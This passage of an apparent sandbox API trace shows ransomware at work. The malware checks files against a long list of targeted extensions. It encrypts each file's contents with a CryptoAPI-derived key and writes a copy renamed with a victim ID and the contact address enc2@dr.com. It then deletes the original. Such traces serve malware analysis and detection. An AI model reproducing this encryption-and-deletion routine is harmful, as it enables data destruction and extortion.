.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bk") returned=".bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0168.538] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.538] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.538] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0168.539] ReadFile (in: hFile=0x390, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x334, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18a640*=0x334, lpOverlapped=0x0) returned 1
	[0168.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.551] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb000) returned 1
	[0168.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.554] CryptCreateHash (in: hProv=0xfcb000, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0168.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.555] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0168.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.555] CryptDeriveKey (in: hProv=0xfcb000, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9670) returned 1
	[0168.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.555] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x334, dwBufLen=0x334 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x340) returned 1
	[0168.556] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.556] RtlMoveMemory (in: Destination=0xfde188, Source=0xfdc138, Length=0x334 | out: Destination=0xfde188) 
	[0168.561] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.561] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfde188*, pdwDataLen=0x18a1ec*=0x334, dwBufLen=0x340 | out: pbData=0xfde188*, pdwDataLen=0x18a1ec*=0x340) returned 1
	[0168.562] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.562] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0168.562] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.562] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0168.562] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.563] CryptReleaseContext (hProv=0xfcb000, dwFlags=0x0) returned 1
	[0168.563] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.563] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.564] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.564] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0168.565] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 136
	[0168.565] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0168.566] WriteFile (in: hFile=0x39c, lpBuffer=0xfde188*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesWritten=0x18a648*=0x340, lpOverlapped=0x0) returned 1
	[0168.568] CloseHandle (hObject=0x39c) returned 1
	[0168.569] CloseHandle (hObject=0x390) returned 1
	[0168.570] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk")) returned 1
	[0168.580] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json.bk")) returned 0
	[0168.581] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe0964002, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe0db65ac, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x14615, dwReserved0=0x0, dwReserved1=0x0, cFileName="utc.app.json", cAlternateFileName="UTCAPP~1.JSO")) returned 1
	[0168.581] lstrcmpW (lpString1="utc.app.json", lpString2="..") returned 1
	[0168.581] lstrcmpW (lpString1="utc.app.json", lpString2=".") returned 1
	[0168.581] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\"
	[0168.581] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\", lpString2="utc.app.json" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json"
	[0168.581] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json") returned 70
	[0168.581] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.582] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json", cchLength=0x46 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json") returned 0x46
	[0168.582] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.582] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json", lpSrch="help_decrypt_your_files") returned 0x0
	[0168.582] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json") returned="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json"
	[0168.582] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json") returned 70
	[0168.582] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.583] StrStrW (lpFirst=".json", lpSrch=".") returned=".json"
	[0168.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.583] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3